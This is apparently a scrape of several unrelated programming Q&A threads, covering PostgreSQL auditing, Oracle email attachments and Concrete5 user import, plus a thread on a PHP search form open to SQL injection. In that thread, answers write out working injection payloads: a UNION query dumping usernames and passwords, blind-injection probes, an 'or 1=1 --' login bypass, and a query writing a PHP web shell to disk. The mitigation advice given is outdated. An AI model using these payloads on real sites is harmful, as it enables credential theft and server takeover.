I am trying to make a audit table where every action on a particular table_A captured in other table_audit.
Unable to find any unique identifier which can be used to capture and decide so & so user had done this activity, something like this. Hope you get my requirement
Example: Employee/user whose companies laptop/machine name is 'JerryLap' apply for leave, i need to know capture 'JerryLap' and if he/she login and apply from different system with 'TomPC' then capture 'TomPC' and push it into database table with IP address.
Version: PostgreSQL 12.12 on x86_64-pc-linux-gnu
I have a postgres database that I'm using to store user audio files. I'm allowing users to provide a title for the files and that title is used as the last path component for the url of the file location. I then store the title and the url in my database. This is clearly not the best way to go about it since i'll run into issues when it comes to renaming and encountering multiple files with the same name. I think the better approach would be to keep the file title and url completely unrelated and use the primary key that postgres assigns to each file uploaded as the last path component of the url. However, the url is created before being inserted into the database, so I don't have the primary key readily available. What would be the proper way of going about this?
This is how I'm currently inserting files:
cur.execute('INSERT INTO files(user_id, title, url, share)'
'VALUES (%s, %s, %s, %s) RETURNING id;',
(user.id, file.title, file.url, file.share))
file_id = cur.fetchone()[0]
One solution would be, before writing a row, I could query for the next available primary key and use that value as the last path component of my url, then write the row. But that requires two calls to the server.
I want to send the content of a table as a mail attachment using utl_smtp.
I am able to extract the content from the table into an excel file by implementing a package mentioned in this url ( https://technology.amis.nl/2011/02/19/create-an-excel-file-with-plsql/ )
Now the file is available in the DB server, under a directory.
How can I pull that file as an attachment. I looked into various post like ( Email .txt file as an attachment through Oracle Stored Procedure , How can I send oracle query results by email. I would prefer attaching to email as excel file. ), yet I am not getting what I am looking out for. Please help
Alright so I am working on a site and it requires some 100 names of people to create an account for. We are using the latest version of Concrete5(c5 is a pain). I have a template for the profile page and all i need to do is edit in the boxes of all the people. is their any easier way than adding them all in manually. We are open to the option of not using c5 for the profile creation portion. I have never had to do something like this so if anyone has any clue on how this could be completed faster please give me some feedback
also all the people i need to add profiles for are in a custom made excel sheet
A fairly easy option would be to create a csv file of the contacts, upload that csv to your C5 directory and then create a single page to import the contacts.
The single page shows nothing only reads the csv file and create new users using the following function: $newUserInfoObject = UserInfo::add($data);
Where $data is an array that can contain
uName - the username. Required.
uEmail - Email address. Required.
uPassword - the non-encrypted password.
uIsValidated - Whether the email address has been validated. If not
specified, -1 will be saved.
uIsFullRecord - Set to 1 unless set in the array to 0.
source: C5 users
(you should check if the username already exists, and if so add an incrementing integer to the username)
After you coded the single page to read the csv and added it in the dashboard (back-end), you go to the page once and your contacts will be imported.
How to create a single page: C5 single pages
After importing the data, delete the single page from the system, so no one else can accidently import the same contacts again.
I am building a very small website (with PHP) and I have 2 big issues
The first one is about my search form
I have build a really simple search form in order to retrieve my content, then I used an online security tool and show me that my search form was vulnerable to SQLi
I had no idea abut that so I started testing some attacks I found on some sites
As far as now only 'OR 'x'='x worked (it returns the entire content of my website, is this bad? How can an attacker hurt me?
The second issue is about my photos, I am using a folder called mywebsite.com/uploads/ to access my photos
Although /upload is protected the subfolders uploads/temp and uploads/thumbs are visible through the browser
May this be hurtful too?
Any advice?
SQL injection is really bad but i like it :)
there is many types of sql injection like
remote sql injecton
blind sql injection
auto bypass sql injection
**Remote sql injection**
its the easy way to get data from site hacker use it like coders
see this example
mysql_query("SELECT * FROM `table_name` WHERE id=".$_GET['id']." ) ;
There is no security in my code
site.php?id=1
my query will execute like
mysql_query("SELECT * FROM `table_name` WHERE id=1 ) ;
if hacker he will kill your code
site.php?id=1(any thing here can make problem ex: ` ' a-z A-Z / * / " )
Because query will be like this
mysql_query("SELECT * FROM `table_name` WHERE id=1' ) ;
so single quotaion will make error in your query
and hacker can attack like this
site.php?id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users
here your query will execute like
mysql_query("SELECT * FROM `table_name` WHERE id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users) ");
and this will work :)
blind sql injection
hacker cannot work with easy way remote sql injection
because it here depend on right and false
so he will use and or
like this
and (select user_name from users) ;
if work fine the script will work good else error will happen
he can know database info like this
example admin table is admin
and (select user_name from users) ; x error
and (select user_name from admin) ; fine
auto bypass
its blicd sql injection but only true condition can access to admin
mysql_query("SELECT * FROM `users` WHERE `user_name`= ".$_POST['user']." AND `password` ='".md5($_POST['pass'])."' ");
hacker can login like this
user = anything' or 1=1 --
so your query will be like
mysql_query("SELECT * FROM `users` WHERE `user_name`= anything or 1=1 --");
anything is error user in databse
but condition or 1=1 is true
-- will ignore your password check
he can access easily
protect
addslashes _ mysql_real_escape_string _ intval ( with number only )
folder premission you can use
empty index.html , index.php ,
If you allow SQL injection, an attacker can do all sorts of bad things to your website. They can inject code to DROP DATABASE, deleting your entire database!
If you are logging into your mysql as the root user, they can potentially write to files (and create) files on your server.
The injection;
SELECT '<?php system($_GET[''cmd'']); ?>' INTO dumpfile('./command.php');
Would be a common first step to breaking into your server, allowing the attacker to execute arbitrary commands under the www-data user. From here it is trivial to recruit your server into a botnet, use it to send spam (getting you blacklisted from sending emails), or simply delete all your files just to ruin your day.
What you must do, is to sanitise all user input. So, in your search processor, you must escape any special characters from the search query before passing it onto the database, you can do this using mysql_real_escape_string();
so;
$search_query = mysql_real_escape_string($_POST['search']);
It is then safe to use $search_query in your mysql query.
SQL injections - it's bad.
someone can run any query he wants in your database, find passwords, delete your entire data etc.
you can avoid it by wrapping all user input in your queries with mysql_real_escape_string
about the directories - it really depends on the accesses you provide. if file listing is available, it doesn't really mean that someone can make changes/execute them
Ad SQL Injection:
Displaying the entire content can be a problem if you have unpublished articles or articles only available for registered users etc.
Try reading more on SQL Injections. It may be possible to execute a second query that inserts new data in your database - or worse changes data (for example passwords). There's a lot of reading material out there, a start could be: http://php.net/manual/en/security.database.sql-injection.php Sanitise all your input and remember: even if you may not find a way to do harm via a security hole it doesn't mean no one will find a way ;)
Ad the folders: you mean that any user can see the content of the folders? If so, users may see pictures they shouldn't see. If you had a good reason for protecting (no file listing?) the main directory, why not apply it to the temps/ and thumbs/ subdirectories?